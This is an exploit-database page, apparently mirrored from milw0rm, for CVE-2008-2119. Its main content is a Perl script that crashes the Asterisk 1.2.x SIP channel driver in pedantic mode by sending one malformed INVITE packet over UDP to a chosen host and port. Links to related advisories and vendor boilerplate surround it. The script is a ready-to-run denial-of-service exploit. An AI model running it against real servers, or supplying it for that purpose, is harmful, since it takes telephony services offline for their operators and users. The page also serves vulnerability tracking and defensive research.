Lucene search
+L

Asterisk 1.2.x - SIP channel driver / in pedantic mode Remote Crash

🗓️ 05 Jun 2008 00:00:00Reported by Armando OliveiraType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 39 Views

Asterisk 1.2.x SIP channel driver remote crash in pedantic mod

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-2119
5 Jun 200800:00
circl
cve
CVE
CVE-2008-2119
4 Jun 200819:17
cve
cvelist
Cvelist
CVE-2008-2119
4 Jun 200819:17
cvelist
debiancve
Debian CVE
CVE-2008-2119
4 Jun 200819:17
debiancve
nessus
Tenable Nessus
GLSA-200905-01 : Asterisk: Multiple vulnerabilities
4 May 200900:00
nessus
nessus
Tenable Nessus
openSUSE 10 Security Update : asterisk (asterisk-5524)
15 Aug 200800:00
nessus
gentoo
Gentoo Linux
Asterisk: Multiple vulnerabilities
2 May 200900:00
gentoo
nvd
NVD
CVE-2008-2119
4 Jun 200819:32
nvd
openvas
OpenVAS
Gentoo Security Advisory GLSA 200905-01 (asterisk)
5 May 200900:00
openvas
openvas
OpenVAS
Gentoo Security Advisory GLSA 200905-01 (asterisk)
5 May 200900:00
openvas
Rows per page
#!/usr/bin/perl -w
###############


# asterisk AST-2008-008
# by [email protected]
#AST-2008-008 - Remote Crash Vulnerability in SIP channel driver when run in pedantic mode

use Getopt::Std;
use IO::Socket;
use strict;

my %args;
getopts("h:p:", \%args);

if (!$args{h} || !$args{p}) { usage(); }


my $sock = IO::Socket::INET->new(
    Proto    => 'udp',
    PeerPort => $args{p},
    PeerAddr => $args{h},
) or die "Could not create socket: $!\n";

$sock->send('INVITE sip:1234@'.$args{h}.' SIP/2.0\n
CSeq: 2 INVITE') or die "Send error: $!\n";




sub usage {
    print STDERR
qq{ $0

Usage: $0 -h <host> -p <port>
        -h <host>       = host
        -p <port>       = port

Example:
        $0 -h target -p port


};

# milw0rm.com [2008-06-05]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Dec 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.07273
39